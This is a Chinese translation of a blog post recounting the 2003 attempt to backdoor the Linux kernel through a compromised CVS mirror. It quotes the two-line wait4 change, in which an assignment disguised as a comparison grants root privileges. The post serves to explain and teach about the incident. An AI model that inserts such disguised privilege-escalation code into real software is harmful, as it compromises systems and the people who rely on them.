揭秘！：2003年Linux後門事件

最近Josh寫了一篇文章，講述2006年Debian Linux中出現的一系列安全bug，探討了這些所謂bug是否是NSA植入的後門。（最後他作出結論：可能不是）

今天我想講述的是另外一個事件——2003年某些人試圖在Linux內核中植入後門的故事。這次事件很明確，的確有人想植入後門，只是我們不知道此人是誰，而且，也許永遠都不會知道了。

時間回到2003年，當時Linux使用一套叫做BitKeeper的系統來存儲Linux源代碼的主拷貝。如果開發者想要提交一份針對源碼的修改，就必須經過一套嚴格的審核過程，以決定這份修改是否能夠合併進主拷貝。每個針對主拷貝的修改都必須附帶一段說明，說明當中都包括了一個記錄相應審核過程的鏈接。

但是有些人不喜歡BitKeeper，於是這些開發者們就用另一套叫做CVS的系統（譯註：Linus一直拒絕使用CVS，後來不得已使用了BitKeeper，並在因某些原因BitKeeper不再讓開源社區免費使用後，花了不到一個月的時間自己開發了GIT的原型，並且投入了使用），維護了一份Linux源代碼的拷貝，這樣他們就能隨時按自己喜歡的方式獲取Linux源代碼了。CVS中的代碼其實就是直接克隆了BitKeeper中的代碼。

但是在2003年11月5日的時候，Larry McVoy發現，CVS中的代碼拷貝有一處改動並沒有包含記錄審核的鏈接。調查顯示，這一處改動由陌生人添加，而且從未經過審核，不僅如此，在BitKeeper倉庫的主拷貝中，這一處改動竟然壓根就不存在。經過進一步調查後，可以明確，顯然有人入侵了CVS的伺服器並植入了此處改動。

神秘人物究竟做了哪些改動？這才是真正有趣的地方。改動修改的是Linux中一個叫wait4的函數，程序可以使用該函數進行掛起操作，以等待某些事件的觸發。神秘人物添加的，就是下面這兩行代碼：

if ((options == (WCLONE|WALL)) && (current->uid = 0))

retval = -EINVAL;

[有C語言編程經驗的人也許會問：這兩行代碼有什麼特別的？請接著往下看]

猛地一看，好像這兩行代碼就是一段正常的錯誤校驗代碼，當wait4函數被某種文檔中禁止的方式調用時，wait4就返回一個錯誤代碼。但是一個真正認真的程序猿立刻就會發現代碼中的問題，注意看在第一行末尾，「= 0」應該是「== 0」才對。是的，「== 0」在這裡才是判斷當前運行代碼的用戶ID(current->uid)是否等於0，而「= 0」不但無法判斷，反而修改了用戶ID的值，即，將其值賦值為0。

將用戶ID設置為0，這是一個很嚴重的問題，因為ID為0的用戶正是「root」，而root賬戶可以在系統中做任何事情，包括訪問所有數據、修改任意代碼的行為，能夠危及到整個系統各個部分的安全。因此，這段代碼的影響就是通過特殊手段使得任何調用wait4函數的軟體都擁有了root許可權。換句話說，這就是一個典型的後門。

客觀地說，這一招很漂亮。看起來就像是無關緊要的錯誤校驗，但真實身份卻是一個後門。而且它混在其他經過審核的代碼中間，幾乎規避了所有審核可能會注意到自己的可能性。

但是它終究還是失敗了，因為Linux小組有足夠強的責任心，注意到了CVS倉庫中的這段代碼沒有經過常規審核。Linux還是略勝一籌。

這是NSA乾的嗎？只能說有可能。因為有太多擁有技術能力和動機的人有可能實施了此次攻擊。那麼，到底是誰呢？除非某些人主動承認，又或者發現新的確鑿證據，否則，我們將永遠不會知道。

via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

本文由 LCTT 原創翻譯，Linux中國 榮譽推出

譯者：tinyeyeser 校對：wxy

本文轉載來自 Linux 中國: https://github.com/Linux-CN/archive